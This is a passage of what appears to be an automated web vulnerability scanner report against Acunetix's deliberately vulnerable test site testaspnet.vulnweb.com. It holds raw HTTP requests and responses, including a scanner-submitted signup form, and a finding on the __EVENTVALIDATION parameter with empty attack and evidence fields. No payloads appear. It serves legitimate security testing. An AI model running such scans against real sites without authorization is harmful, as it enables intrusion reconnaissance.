87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLEirm5BAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO%2FZZOlJz58
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18076
Response Body - size: 18,076 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyytPMBgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMJd1ucUfNI8x3o4I+C+TrBHqvCj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 407 bytes.	POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Signup.aspx Content-Length: 1186 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,186 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj%2Fih5dbVl0OMxvkohxyr8Ec4YAg%3D%3D&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBBsKql%2FxMtNSXxlEXNG8K%2FC7XIc2&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 13329
Response Body - size: 13,329 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBBsKql/xMtNSXxlEXNG8K/C7XIc2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> <span id="lblStatus">Subscription successfull. Please visit the login page to login.</span> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> 